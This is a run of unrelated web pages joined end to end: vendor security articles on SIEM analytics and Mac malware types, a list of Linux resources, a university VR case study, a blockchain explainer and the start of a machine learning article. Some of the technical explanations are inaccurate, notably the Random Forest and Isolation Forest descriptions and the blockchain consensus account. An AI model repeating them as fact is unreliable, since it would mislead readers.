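print(session_key.hex())  # a 32-byte key that depends on both secrets
```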
You should also implement a centralized key management system, ensuring all your cryptographic keys are managed in accordance with best practices and giving you the ability to efficiently migrate to post-quantum algorithms when the time comes.
Finally, follow NIST’s activities to keep abreast of developments in the fast-changing world of post-quantum cryptography.
You’re in Safe Hands with Fortanix
Fortanix Data Security Manager (DSM) is an enterprise key management solution with an integrated, software-defined HSM, certified up to FIPS 140-2 Level 3. Fortanix DSM has a modern, flexible architecture and is developed using an agile methodology, making it the ideal vehicle for supporting the roll-out of quantum-resistant algorithms in the future.
Security Big Data Analytics: Past, Present and Future
Security big data analytics, or cybersecurity analytics, helps security analysts and solution vendors do much more with log and event data. Legacy Security Information and Event Management (SIEM) solutions are limited to manually defining correlation rules, which are brittle, hard to maintain, and result in many false positives.
Machine learning techniques can help security systems identify patterns and threats with no prior definitions, rules, or attack signatures, and with much higher accuracy. However, to be effective, machine learning needs very large volumes of data. The challenge is storing more data, analyzing it in a timely manner, and extracting new insights.
In this article:
- How big data analytics helps combat cyberthreats
- Key concepts in big data and security
- Three algorithms for detecting anomalies
- How SIEMs leverage big data analytics
How can security big data analytics combat cyberthreats?
Traditionally, security technologies used two primary analytical techniques to detect security incidents:
- Correlation rules — manually defined rules specifying a sequence of events that indicates an anomaly, which could represent a security threat, vulnerability or active security incident.
- Network vulnerabilities and risk assessment — scanning networks for known attack patterns and known vulnerabilities, such as open ports and insecure protocols.
The common denominator of these older techniques is that they are good at detecting known bad behavior. However they suffer from two key drawbacks:
- False positives — Because they are based on rigid, predefined rules and signatures, there is a high level of false positives, leading to alert fatigue.
- Unknown events — What happens if a new type of attack is attempted that no one had created a rule for? What happens if an unknown type of malware infects your systems? Traditional systems based on correlation rules find it difficult to detect unknown threats.
Advanced threat analytics powered by machine learning
Addressing unknown risks, including insider threats (which are difficult to detect because they involve legitimate credentials logged into corporate systems), requires advanced analytics. Advanced threat analytics technology can:
- Identify anomalies in personnel or device behavior — Create a model of “normal” behavior for a person, a device, or a group of devices on the network, and identify anomalies, even ones that were not predefined as rules.
- Detect anomalies in the network — Create a model of network traffic to identify anomalies. Is traffic unusual for this period or time of day?
- Perform machine learning based malware detection — Analyze binaries transmitted by email or downloaded, including those not flagged by antivirus, to understand whether the program is benign or malicious.
- Perform machine learning based intrusion detection — Identify patterns in network traffic or access control that are similar to historic intrusions or attacks.
To achieve these types of analysis, new analytics methods and access to data is needed.
Key concepts in data science, machine learning, and cybersecurity
What is data science?
Data science leverages scientific and mathematical analysis of data sets, as well as human understanding and exploration, to derive business insights from big data.
IN THE CONTEXT OF SECURITY: Data science helps security analysts and security tools make better use of security data, to discover hidden patterns and better understand system behavior.
What is machine learning in cybersecurity?
Machine learning is part of the general field of artificial intelligence (AI). It uses statistical techniques to allow machines to learn without being explicitly programmed.
IN THE CONTEXT OF SECURITY: Machine learning goes beyond correlation rules, to examine unknown patterns and use algorithms for prediction, classification and insight generation.
Important note: Artificial Intelligence (AI) is claimed to be a part of many security analytics solutions. Don’t take vendor claims for granted; check what exactly is included in the term “AI”. How are vendors building their models? Which algorithms are used? Look under the hood to understand what exactly is being offered.
Supervised vs. unsupervised learning
Supervised machine learning
In supervised learning, the machine learns from a data set that contains inputs and known outputs. A function or model is built that makes it possible to predict what the output variables will be for new, unknown outputs.
IN THE CONTEXT OF SECURITY: Security tools learn to analyze new behavior and determine if it is “similar to” previous known good or known bad behavior.
Unsupervised machine learning
In unsupervised learning, the system learns from a dataset that contains only input variables. There is no correct answer, instead the algorithm is encouraged to discover new patterns in the data.
IN THE CONTEXT OF SECURITY: Security tools use unsupervised learning to detect and act on abnormal behavior (without classifying it or understanding if it is good or bad).
What is deep learning in cybersecurity?
Deep learning techniques simulate the human brain by creating networks of digital “neurons” and using them to process small pieces of data, to assemble a bigger picture. Deep learning is most commonly applied to unstructured data, and can automatically learn the significant features of data artifacts. Most modern applications of deep learning utilize supervised learning.
IN THE CONTEXT OF SECURITY: Deep learning is primarily used in packet stream and malware binary analysis, to discover features of traffic patterns and software programs and identify malicious activity.
What is data mining in cybersecurity?
Data mining is the use of analytics techniques, primarily deep learning, to uncover hidden insights in large volumes of data. For example, data mining can uncover hidden relations between entities, discover frequent sequences of events to assist prediction, and discover classification models which help group entities into useful categories.
IN THE CONTEXT OF SECURITY: Data mining techniques are used by security tools to perform tasks like anomaly detection in very large data sets, classification of incidents or network events, and prediction of future attacks based on historical data.
What is user entity behavior analytics (UEBA)?
UEBA solutions are based on a concept called baselining. They build profiles that model standard behavior for users, hosts and devices (called entities) in an IT environment. Using machine learning techniques, they identify anomalous activity, comparing the activity to established baselines to detect security incidents.
The primary advantage of UEBA over traditional security solutions is that it can detect unknown or elusive threats, such as zero day attacks and insider threats. In addition, UEBA reduces the number of false positives because it adapts and learns actual system behavior, rather than relying on predetermined rules which may not be relevant in the current context.
Three algorithms for detecting outliers and anomalies
Random Forest is a powerful supervised learning algorithm that addresses the shortcomings of classic decision tree algorithms. A decision tree attempts to fit behavior to a hierarchical tree of known parameters.
For example, in the tree below, customer satisfaction is distributed according to two variables: product color and customer age. A decision tree algorithm will inaccurately predict that a different color or slightly different age is a good predictor of satisfaction. This is called overfitting—the model uses insufficient or inaccurate data to make predictions on new data.
Random Forest automatically breaks up decision trees into a large number of subtrees or stumps. Each subtree emphasizes different information about the population under analysis. It then obtains the result of each subtree, and takes a majority vote of all the subtrees to obtain the final result (a technique called bagging).
By combining all the subtrees together, Random Forest can cancel out the errors of each individual tree and dramatically improve model fitting.
IN A SECURITY CONTEXT: Random Forest can help analyze sequential event paths and improve predictions about new events, even when the underlying data is insufficient or improperly structured.
Dimension Reduction is the process of converting a data set with a high number of dimensions (or parameters describing the data) to a data set with less dimensions, without losing important information.
For example, if the data includes one dimension for the length of objects in centimeters and another dimension for inches, one of these dimensions is redundant and does not really add any information, as can be seen by their high correlation. Removing one of these dimensions will make the data easier to explain.
Generally speaking, a Dimension Reduction algorithm can determine which dimensions do not add relevant information and reduce a data set with n dimensions to k, where k<n.
Besides correlation analysis, other ways to remove redundant dimensions include analysis of missing values, variables with low variance across the data set, using decision trees to automatically pick the least important variables and augmenting those trees with Random Forest, factor analysis, backward feature elimination (BFE), and principal component analysis (PCA).
IN A SECURITY CONTEXT: Security data typically consists of logs with a large number of data points about events in IT systems. Dimension Reduction can be used to remove the dimensions that are not necessary for answering the question at hand, helping security tools identify anomalies more accurately.
Isolation Forest is a technique for detecting anomalies or outliers. It isolates data points by randomly selecting a feature of the data, then randomly selecting a value between the maximum and minimum values of that feature. The process is repeated until the feature is found to be substantially different from the rest of the data set.
The system repeats this process for a large number of features, and builds a random decision tree for each feature. An anomaly score is then computed for each feature, based on the following assumptions:
- Features which are really anomalies will take only a small number of isolation steps to be far off from the rest of the data set.
- Features which are not anomalies will take numerous isolation steps to become far off from the data set.
A threshold is defined, and features which require relatively long decision trees to become fully isolated are determined to be normal, with the rest determined to be abnormal.
IN THE CONTEXT OF SECURITY: Isolation Forest is a technique that can be used by UEBA and other next-gen security tools to identify data points that are anomalous compared to the surrounding data.
SIEM and Big Data Analytics
Security Information and Event Management (SIEM) systems are a core component of large security organizations. They capture, organize and analyze log data and alerts from security tools across the organization. Traditionally, SIEM correlation rules were used to automatically identify and alert on security incidents.
Because SIEMs provide context on users, devices and events in virtually all IT systems across the organization, they offer ripe ground for advanced analytics techniques. Today’s SIEMs either integrate with advanced analytics platforms like UEBA, or provide these capabilities as an integral part of their product.
Next-generation SIEMs can leverage machine learning, deep learning, and UEBA to go beyond correlation rules and provide:
- Complex threat identification — Modern attacks often consist of several types of events, each of which might appear innocuous on its own. Advanced data analytics looks at data for multiple events over a historic timeline, and captures suspicious activity.
- Entity behavior analysis — SIEMs baseline behavior of critical assets like servers, medical equipment or industrial machinery, and automatically discover anomalies that suggest a threat.
- Lateral movement detection — Attackers who penetrate an organization typically move through a network, accessing different machines and switching credentials, to escalate their privileges for access to sensitive data. SIEMs analyze data from across the network and multiple system resources, and use machine learning to detect lateral movement.
- Insider threats — SIEMs identify that a person or system resource is behaving abnormally. They can “connect the dots” between a misbehaving user account and other data points, to discover a malicious insider, or a compromised insider account.
- Detection of new types of attacks — by leveraging advanced analytics, SIEMs capture and alert on zero day attacks, or malware which does not match a known binary pattern.
Exabeam is an example of a next-generation SIEM with built-in advanced analytics capabilities — including complex threat identification, automatic event timelines, dynamic peer grouping of similar users or entities, lateral movement detection and automatic detection of asset ownership.
Learn more about Cybersecurity Big Data Analytics
Have a look at these articles:
- What UEBA Stands For (And a 5-Minute UEBA Primer)
- What Is UEBA and Why It Should Be an Essential Part of Your Incident Response
- Threat Detection and Response: How to Stay Ahead of Advanced Threats
- User Behavior Analytics (UBA/UEBA): The Key to Uncovering Insider and Unknown Security Threats
- Behavioral Profiling: The Foundation of Modern Security Analytics
A Crash Course on Security Analytics — And How to Spot Fake UEBA From a Mile Away
Exabeam in Action: Stopping Lapsus$ in Their Tracks
Ransomware: Bigger, Better, and Still Going Strong
Exabeam News Wrap-up – Week of September 19, 2022
Exabeam News Wrap-up – Week of September 12, 2022
The 4 Steps to a Phishing Investigation
Subscribe today and we'll send our latest blog posts right to your inbox, so you can stay ahead of the cybercriminals and defend your organization.
See a world-class SIEM solution in action
Most reported breaches involved lost or stolen credentials. How can you keep pace?
Exabeam delivers SOC teams industry-leading analytics, patented anomaly detection, and Smart Timelines to help teams pinpoint the actions that lead to exploits.
Whether you need a SIEM replacement, a legacy SIEM modernization with XDR, Exabeam offers advanced, modular, and cloud-delivered TDIR.
Get a demo today! | <urn:uuid:2fde1d40-49ea-45f5-882c-a37760fe2f40> | CC-MAIN-2022-40 | https://www.exabeam.com/ueba/security-big-data-analytics-past-present-and-future/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00115.warc.gz | en | 0.901224 | 2,813 | 2.765625 | 3 |
Viruses are the common cold of computers: easily spread and often misdiagnosed. The word “virus” is frequently misused in describing other forms of malware. Actual viruses are a small bit of executable code that spreads when users open infected files or applications. A few viruses that affect Mac OS X have been found, and Mac users can also inadvertently spread Windows viruses by passing along infected files.
A Trojan horse is like the college roommate that seems cool until they stop paying rent, eat your food and leave dirty clothes everywhere. It enters under the pretense of usefulness but actually contains malicious code. Several Trojan horses affect Mac OS X, most notably the Flashback Trojan.
Worms are like the elusive varmint scurrying through the insulation in your wall. Because they don’t need to attach themselves to an existing file or program, they can be very difficult to find. Unlike viruses, worms spread over networks on their own, and can carry out malicious actions once they find new hosts.
Spyware is like the creepy neighbor that stares in your window and shuffles through your mail. It often enters your Mac as a Trojan horse and then secretly monitors your computing behavior, collecting personal information such as surfing habits and web sites you’ve visited.
A botnet is like an army of zombie computers bent on destruction. Your Mac could be forced to join the zombie army as a consequence of a malware attack. The network of compromised computers is then used to send spam or to attack other computers.
Spam is the mosquito of the computer world: annoying and ubiquitous. A single spam message can be dealt with easily enough, but en masse it can crowd your inbox and cause a significant loss of productivity.
An exploit is like a schoolyard bully that zeroes in on your weaknesses. It’s a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to break through your Mac’s security defenses. | <urn:uuid:1f58b533-820d-4cb6-89f3-64f60384ee7b> | CC-MAIN-2022-40 | https://www.intego.com/mac-malware-definitions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00115.warc.gz | en | 0.927637 | 436 | 3.25 | 3 |
Linux is a family of open source operating systems first released in 1991. Named after its principal author, Linus Torvalds, and initially developed only for personal computers, it is now the most versatile family of operating systems, used on everything from smartphones to servers.
Due to its reputation as a robustly stable open license product, a loyal community has developed to continually improve and expand Linux. Consequently, there is a sea of information available for users and developers to consult. It can be overwhelming to navigate such a surplus of resources, so we’ve compiled a list of some of the most valuable ones to help you find what you need.
Linux User Groups
Linux user groups, also known as a LUG, are typically non-profit collectives of people that network, discuss Linux, provide support for other users, establish education initiatives, and further the development of Linux. Groups are often formed based on location to allow for meetups and planning local events. However, there are some groups that exist entirely online. Additionally, there are global groups, like LinuxChix, which focuses on women in the Linux community. Given Linux’s popularity, it’s no surprise that hundreds of groups exist around the globe.
One of the oldest and largest groups, SVLUG, located in Silicon Valley, has been in existence since 1988 before Linux was even released. Initially formed as a PC-Unix Special Interest Group of the Silicon Valley Computer Society, they quickly evolved into a dedicated Linux user group that has hosted Linus Torvalds at several of their meetings.
Since groups continue to pop up, no comprehensive, continually managed list exists, but local groups can be found through a quick Google search.
Online forums can hold the answers to the most obscure questions, but they are a double-edged sword. In addition to the wealth of answers to niche questions, users can also suffer sheer information overload, or worse, get dangerous misinformation. Below are three trustworthy Linux forums.
Linux – It makes sense that a reliable source of information would be on the main Linux website. There are a number of well-organized forums, with topics ranging from “General Linux” to “Advanced Linux Tutorials.” Linux recently overhauled its website and purged a large amount of content, so the forums only date back to 2017, which means there’s a smaller chance of you stumbling upon outdated information. The main website also hosts an impressively thorough set of man pages for anyone in need of an explanation of any Linux command.
Linux Questions – One of the most active Linux forums is Linux Questions. One of the most popular topics is “Newbie,” where new users can ask any question and receive assistance from any number of generous expert users. One advantage of this forum is that members are assigned a reputation score, indicating both the number of posts they’ve made and how helpful people have found them.
Reddit – Though we certainly won’t vouch for the veracity of the rest of the site, the Linux subreddit is very well moderated. One big benefit of Reddit’s notoriety is its ability to attract well known people. Linux is no exception. The subreddit often hosts ‘Ask Me Anything’ (AMA) sessions in which users can ask questions of notable experts. Some AMA guests include the founder of Bedrock Linux, Red Hat CEO Jim Whitehurst, and Nat Friedman, the CEO of GitHub.
We know writing about a blog on a blog is getting a little meta, but there are a number of excellent Linux blogs that are worth following for the latest news.
Linux Foundation – Founded in 2000, the Linux Foundation is a non-profit that focuses on standardizing and helping to grow Linux. Since they are a direct supporter of the work of Linux founder Linus Torvalds and Greg Kroah-Hartman, a primary Linux developer, the foundation’s blog is a must read for Linux devotees.
Linux Journal – The first magazine about Linux to be published, this magazine and its corresponding blog specialize in news, reviews, and recommendations for Linux experts.
SUSE – SUSE is the original provider of enterprise Linux distribution, and continues to provide enterprise-grade open source solutions and support. As such a leader in the field, their blog is full of useful information for organizations using Linux. | <urn:uuid:1aaff624-df64-4daf-a5d4-72b6cdc41575> | CC-MAIN-2022-40 | https://www.helpsystems.com/blog/linux-user-groups-forums-blogs | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00115.warc.gz | en | 0.945589 | 903 | 2.828125 | 3 |
If a midwife can’t identify the position of the placenta and lets the woman go into natural labour with the baby obstructed, the baby’s life is at serious risk.
“At the moment we teach with dolls and pelvises, and I can tell you firsthand from being a student as well as an educator, the position of the placenta is one of the hardest things to learn, and yet it’s absolutely one of the most imperative things to know,” says University of Newcastle lecturer in midwifery Donovan Jones.
Since earlier this year, students now have a new tool to help them understand the issue and learn how to deal with it.
Road to Birth is a virtual reality app which takes users on “a journey through pregnancy”, depicting a life-size female figure, whose gestation can be explored and observed, including crucial birth considerations like the baby’s orientation and placental positioning.
It is one of six immersive technology solutions for the university’s Faculty of Health and Medicine which has been developed and implemented over the last 18 months by the University of Newcastle IT Services team in close collaboration with educators.
The benefits of the tools are manifold.
“Simulation labs typically comprise a physical lab space set up to mirror a typical birthing suite of a hospital, with an attached control room to manage scenarios, using rubber sim-babies and a variety of medical equipment. These labs are timetabled at specific times of the semester around resourcing, are expensive to set up and run, and are limited by practitioner availability,” explains University of Newcastle chief information officer Anthony Molinia.
Now students benefit from “anytime/anywhere access” to the learning tools, which they can use to practice as many times as is required. That’s particularly useful given the relatively high proportion of students from low socio-economic backgrounds who often have to work during lab hours.
There’s also the opportunity for the immersive experiences to be gamified to improve learning outcomes.
“There was also an unexpected emotional reaction at times to the VR simulations. This provided the teaching staff more effective and deeper insights – which can be utilised to help better emotionally prepare the students for the real world scenarios,” Molinia adds.
There have been knock-on effects too, such as a shift in thinking around the reliance on complicated timetabling given so much learning at the university happens out of hours and off campus. The roll-out has also generated commercial interest in the unique proposition.
Listen and collaborate
The immersive technology projects were undertaken with close collaboration between the faculty, students and IT, utilising human centred design and lean canvas techniques.
“This in itself was challenging given the need to focus on outcomes in a ‘time and cost box’ as well as taking an iterative approach to solution development…It led to standing up a bespoke ‘innovation space’ for open collaboration, design thinking and iterative testing and development,” Molinia explains.
The closer collaboration between IT and stakeholders is borne out of Molinia’s work over the last 24 months to “gain trust” from faculties and the university’s leadership team.
Molinia went on a ‘listening tour’ soon after joining the university “to understand what was working well, what wasn’t working well and what their key imperatives were for the future,” he says.
That listening continues today in the form of an IT Performance Dashboard which includes customer sentiment, and a ‘360 degree feedback channel’.
“In combination these actions increased our presence in the organisation, facilitated IT being included ‘at the table’ and provided us with the ability to have a voice from the ranks through to the leaders,” Molinia says, adding that the result is a roughly 40 per cent increase in IT investment over the next seven years.
And as the IT function has evolved into a trusted advisor and strategic partner to the university, within it has become more “cohesive and effective” department with a “positive, inclusive and fun culture”.
Keep your balance
Molinia says that the biggest lesson he has learned over his career as a CIO is to maintain balance and perspective.
“That is balance and perspective across everything, whether it be attention to innovation versus commodity; work versus fun; asking for permission versus asking for forgiveness; picking your battles versus fighting every one; or taking time to reflect and think versus trying to go too fast,” he says.
“It has provided me with an empathy and self-awareness that I believe is critical to be a good leader, motivator and mobiliser or innovation,” he adds. | <urn:uuid:179f6de9-da6a-4611-babf-39b05a58e58a> | CC-MAIN-2022-40 | https://www.cio.com/article/214280/cio50-2018-26-50-anthony-molinia-university-of-newcastle.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00115.warc.gz | en | 0.957327 | 999 | 2.875 | 3 |
As a leader in your organization, you have a duty to your organization to understand why blockchain technology will transform the economy.
Why was blockchain started?
The bursting of the U.S. housing bubble underpinned the global financial crisis of 2007-08 and caused the value of securities linked to U.S. real estate to nosedive. Easy access to subprime loans and the overvaluation of bundled subprime mortgages all leaned on the theory that housing prices would continue to climb.
Ultimately, the Financial Crisis Inquiry Commission determined the entire financial crisis was avoidable and caused by widespread failures in financial regulation and supervision. There were many reasons for the financial crisis, including subprime lending, the growth of the housing bubble and easy credit conditions. The world believed that “trusted third parties” such as banks and financial institutions were dependable. Unfortunately, the global financial crisis proved intermediaries are fallible. The crisis resulted in evictions, foreclosures and extended unemployment; it was considered the worst financial crisis since the Great Depression.
In response to this horrible global financial upheaval, in 2008, Satoshi Nakamoto wrote a paper titled, “Bitcoin: A Peer-to-Peer Electronic Cash System.” The paper suggested that “trusted third parties” could be eliminated from financial transactions.
What’s Bitcoin and how does it relate to blockchain?
Bitcoin is a peer-to-peer system for sending payments digitally signed to the entire Bitcoin network. When the “b” is capitalized, “Bitcoin” refers to that network, e.g., “I want to understand how the Bitcoin network operates.” When the “b” is not capitalized, the word “bitcoin” is used to describe a unit of account or currency, e.g., “I sent 1 bitcoin to a friend.” The digital signature is made from public keys (given to anyone for sending assets) and private keys (held by the asset owner).
The public ledger of Bitcoin transactions is called a blockchain, and Bitcoin runs on top of this blockchain technology. Blockchains are permissionless distributed databases: public records of transactions in chronological order. Blockchain technology creates a decentralized digital public record of transactions that is secure, anonymous, tamper-proof and unchangeable — a shared single source of truth. Blockchains apply to any industry where information is transferred and roughly fall into the following six classifications:
1. Currency (electronic cash systems without intermediaries).
2. Payment infrastructure (remittance; sending money in payment).
3. Digital assets (exchange of information).
4. Digital identity (IDs for digitally signing to reduce fraud).
5. Verifiable data (verify the authenticity of information or processes).
6. Smart contracts (software programs that execute without trusted third parties).
How blockchains work
For the first time in history, blockchain removes — or disintermediates — the middleman from business transactions and by doing so improves the value of existing products, services and interactions in the following ways:
Preventing double spending: With blockchain, you can’t spend money more than once. Blockchain presents a solution by ensuring the authenticity of any asset and preventing duplicate expenditures (real estate, medical claim, insurance, medical device, voting ballots, music and government record or payments to program beneficiaries).
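The core of double-spend prevention can be sketched as a ledger that tracks which "coins" have already been used. This is an illustrative toy, not Bitcoin's actual UTXO implementation, and the coin and account names are invented:

```python
# Toy ledger that rejects double spends by remembering which coins
# (transaction outputs) have already been used. Sketch only.
class Ledger:
    def __init__(self):
        self.spent = set()   # ids of coins that have been spent
        self.history = []    # accepted transactions

    def submit(self, coin_id, sender, receiver):
        """Accept the transfer only if the coin is still unspent."""
        if coin_id in self.spent:
            return False     # double-spend attempt: reject
        self.spent.add(coin_id)
        self.history.append((coin_id, sender, receiver))
        return True

ledger = Ledger()
print(ledger.submit("coin-1", "alice", "bob"))    # True: first spend accepted
print(ledger.submit("coin-1", "alice", "carol"))  # False: double spend rejected
```

In a real blockchain this bookkeeping is replicated across every node, so no single party can quietly "forget" that a coin was spent.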
Establishing consensus: In this new model, the “crowd” is a network of computers that work together to reach agreement. Once 51% of the computers in the network agree, “consensus” has been reached and the transaction is recorded in a digital ledger called the blockchain. The blockchain contains an ever-growing, ordered list of transactions. Each computer holds a full copy of the entire blockchain ledger. Therefore, if one computer attempts to submit an invalid transaction, the computers in the network will not reach consensus (51% agreement) and the transaction will not be added to the blockchain.
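The 51% rule itself is simple enough to sketch in a few lines. This hypothetical example treats each node's validation result as a boolean vote:

```python
# Minimal sketch of majority consensus: a transaction is accepted only
# if a strict majority of nodes validate it. Not a real protocol.
def reaches_consensus(votes):
    """votes: one boolean per node in the network."""
    approvals = sum(votes)                 # True counts as 1
    return approvals / len(votes) > 0.5    # strict majority (the 51% rule)

honest_network = [True] * 7 + [False] * 3   # 70% of nodes validate the block
tampered_claim = [True] * 4 + [False] * 6   # only 40% validate it

print(reaches_consensus(honest_network))  # True: transaction is recorded
print(reaches_consensus(tampered_claim))  # False: transaction is rejected
```

Real consensus mechanisms (proof of work, proof of stake) are far more involved, but they all reduce to the same idea: no single machine's vote decides the outcome.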
There are four principles of blockchain networks.
- Distributed: Across all the peers participating in the network. Blockchain is decentralized, and every computer (full node) has a copy of the blockchain.
- Public: The actors in a blockchain transaction are hidden, but everyone can see all transactions.
- Time-stamped: The dates and times of all transactions are recorded in plain view.
- Persistent: Because of consensus and the digital record, blockchain transactions can’t catch fire, be misplaced or get damaged by water.
Steps to create a block (transaction)
Blocks are a record of transactions and chains are a series of connected transactions (blocks).
- Create transaction: A miner (computer) creates a block.
- Solve the puzzle: A miner (computer) performs repeated mathematical calculations to solve a cryptographic puzzle; solving it produces a “proof of work.”
- Receive “proof of work:” If the puzzle is solved — the “proof of work” is a piece of data that is difficult (costly, time-consuming) to produce but easy for others to verify and which satisfies certain requirements. In short, it’s difficult to solve the puzzle but easy to verify it’s solved correctly.
- Broadcast “proof of work:” The miner broadcasts its successful proof of work to other miners.
- Verification: Other miners verify the “proof of work.”
- Publish block: If the miners reach consensus (51% agreement) that the proof the miner presented solved the puzzle, then that transaction is published to the blockchain.
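The puzzle-solving and verification steps above can be sketched with a hash-based proof of work: find a nonce whose hash starts with a required number of zeros. Finding the nonce takes many attempts, but any other miner can verify it with a single hash (the block data and difficulty here are invented for illustration):

```python
# Proof-of-work sketch: costly to produce, trivial to verify.
import hashlib

def hash_block(data, nonce):
    return hashlib.sha256(f"{data}{nonce}".encode()).hexdigest()

def mine(data, difficulty=4):
    """Search nonces until the hash starts with `difficulty` zeros."""
    nonce = 0
    while not hash_block(data, nonce).startswith("0" * difficulty):
        nonce += 1
    return nonce

def verify(data, nonce, difficulty=4):
    """Verification is one hash: easy to check, hard to fake."""
    return hash_block(data, nonce).startswith("0" * difficulty)

nonce = mine("block 101: alice pays bob 1 BTC")
print(verify("block 101: alice pays bob 1 BTC", nonce))  # True
```

Raising `difficulty` by one hex digit multiplies the expected search work by 16, which is how real networks tune how hard the puzzle is.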
Why are blockchains secure?
With blockchain technologies, truth can also be measured and consumers and producers can prove data is authentic and uncompromised.
To create a new block, block 101, some data from the previous block, block 100, is used. Specifically, its hash: a fixed-length fingerprint produced by an algorithm that deterministically condenses an arbitrarily large amount of data. Then, to create the new block 102, information from block 101 is used, and so on; each block depends on the prior block, like bulbs on a string of Christmas-tree lights. If a bulb were pulled from the string (a past transaction changed), the attacker would have to recompute every later block in the chain. Probabilistically this is almost impossible, as the rest of the network would not reach consensus on the proposed change.
The result is an immutable digital record for every agreed transaction: a single source of truth.
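The chaining idea can be demonstrated in a few lines: each block stores the hash of the previous block, so editing any past block breaks every later link. The transaction strings below are invented for illustration:

```python
# Hash chaining sketch: tampering with any past block invalidates the chain.
import hashlib

def block_hash(index, data, prev_hash):
    return hashlib.sha256(f"{index}{data}{prev_hash}".encode()).hexdigest()

def build_chain(records):
    chain, prev = [], "0" * 64            # the genesis block has no predecessor
    for i, data in enumerate(records):
        h = block_hash(i, data, prev)
        chain.append({"index": i, "data": data, "prev": prev, "hash": h})
        prev = h                          # the next block will point back here
    return chain

def is_valid(chain):
    for i, block in enumerate(chain):
        if block["hash"] != block_hash(i, block["data"], block["prev"]):
            return False                  # the block's own hash doesn't match
        if i > 0 and block["prev"] != chain[i - 1]["hash"]:
            return False                  # the link to the prior block is broken
    return True

chain = build_chain(["pay bob 1", "pay carol 2", "pay dave 3"])
print(is_valid(chain))                    # True
chain[1]["data"] = "pay mallory 999"      # tamper with an old block
print(is_valid(chain))                    # False: the chain detects the edit
```

A real network adds proof of work and consensus on top, so a tamperer would also need to out-compute the majority of miners, not just recompute hashes.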
Why blockchain technologies will transform the world
Blockchain technologies will improve trust in industries where information (assets) is transferred, including these:
- Accounting (auditing and fraud prevention).
- Aerospace (location of parts and chain-of-custody).
- Energy (smart metering and decentralized energy grid).
- Healthcare (medical devices and health information interoperability).
- Finance (remittance and currency exchange).
- Real-estate (deeds transfer and speed buying or selling property).
- Education (better manage assessments, credentials, transcripts).
Blockchain technologies will change everything — from clothes you wear, the food you eat and even the products you buy. | <urn:uuid:fec36218-fc70-4690-96c7-4b84a3356b8a> | CC-MAIN-2022-40 | https://www.cio.com/article/238992/if-i-only-had-5-minutes-to-explain-blockchain.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00115.warc.gz | en | 0.921726 | 1,480 | 2.875 | 3 |
Data democratisation extends data access to everybody (or nearly everybody) within an organisation. The process of data democratisation also involves ensuring that non-technical employees feel comfortable working with and interpreting your company’s data.
Without your IT department acting as the gatekeepers to your company’s data, a broader range of stakeholders can draw insights from it and use it to inform their work.
Data democratisation means people encounter less friction when accessing data, leading to greater fluidity and encouraging quick and creative decision-making. For example:
- Sales teams have easy access to data about leads and prospective customers
- Marketing can access data about conversions to improve their content
- Helpdesk teams can access application usage data to better support colleagues with technical issues
In a “data-democratised” workplace, these teams no longer have to request permission to access restricted data silos—they’re empowered to take the initiative and use data in a way that best serves the company.
But while the benefits of data democratisation are clear, you must lay a foundation of good governance, clear policies and strong security before embarking on the data democratisation process.
Use the Right Tools For the Job
Data democratisation doesn’t mean simply giving everyone access to raw data—or even preparing visualisations of data that can be understood by non-technical staff.
To truly democratise your data, you must give people free access to “real-world” data, and ensure they can make sense of the data and use it to inform their work.
This means using the right tools to present your data in an accessible and understandable way.
You might require multiple tools to provide meaningful access to different data types and for different purposes. The data requirements of helpdesk teams vary considerably from those of marketing departments, for example.
You also need to ensure technically-minded staff can assist their non-technical colleagues—by answering their questions and supporting them to make sense of the data.
Data democratisation shouldn’t mean data anarchy: the process must be carefully managed.
For example, it should go without saying that wider access to a company’s data doesn’t mean every employee gets to read their colleagues’ HR files.
Compliance comes first, and your data democratisation project will be constrained by legal requirements arising from laws like the General Data Protection Regulation (GDPR) in the EU, or the California Consumer Privacy Act (CCPA) in the US.
That said, these regulations are not incompatible with a well-managed, rational data democratisation project. They might mean anonymising personal data where possible, and only extending access to non-personal data as far as is appropriate.
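One common first step toward wider data access is pseudonymising direct identifiers before sharing. The sketch below replaces an email address with a salted-hash pseudonym; the salt value and record fields are invented, and note that salted hashing alone is pseudonymisation, not full anonymisation, so a real project still needs a de-identification review:

```python
# Pseudonymisation sketch: mask identifiers while keeping usage data.
import hashlib

SALT = "store-this-secret-separately"    # hypothetical secret value

def pseudonymise(value):
    """Deterministic pseudonym: the same input always maps to the same token."""
    return hashlib.sha256((SALT + value).encode()).hexdigest()[:12]

record = {"email": "jane@example.com", "plan": "pro", "logins": 42}
shared = {**record, "email": pseudonymise(record["email"])}

print(shared["plan"], shared["logins"])        # usage data survives intact
print(shared["email"] != record["email"])      # True: identity is masked
```

Because the mapping is deterministic, analysts can still join records about the same (masked) user across datasets without ever seeing the real identifier.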
Your security controls must also be informed by clear data protection and security policies and a culture of data protection.
Ensure Good Data Governance
A solid data governance program is vital to underpin any data democratisation project.
Good data governance reduces the likelihood of data security incidents—for example, by setting rational retention periods to manage when old data is deleted, or by prohibiting the collection of unnecessary personal data.
Data governance also helps organisations to get the most out of their data, by improving data quality and ensuring that there is a solid process for data sharing.
The general principle of data democratisation is that broader access to data is good for the organisation. But diligent data governance is required to make the process work. | <urn:uuid:5498a34a-e309-46ee-8407-fbe50dc0cbec> | CC-MAIN-2022-40 | https://www.grcworldforums.com/democratisation-data-analytics-/data-democratisation-three-foundation-stones/3762.article | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00115.warc.gz | en | 0.905429 | 713 | 2.5625 | 3 |
Best Practices for Selecting and Implementing Machine Learning Systems
Walk into any executive-level meeting these days, and you’ll hear plenty of chatter about machine learning (ML) and artificial intelligence (AI), but what do they really mean? ML is complex because it includes concepts from multiple areas, such as mathematics, computer science, statistics, and logic. These are all highly technical and seldom explained in a simple manner. Let us introduce a few key ML and AI technical terms and how people apply these techniques and share some best practices and challenges for implementing ML systems using these technologies.
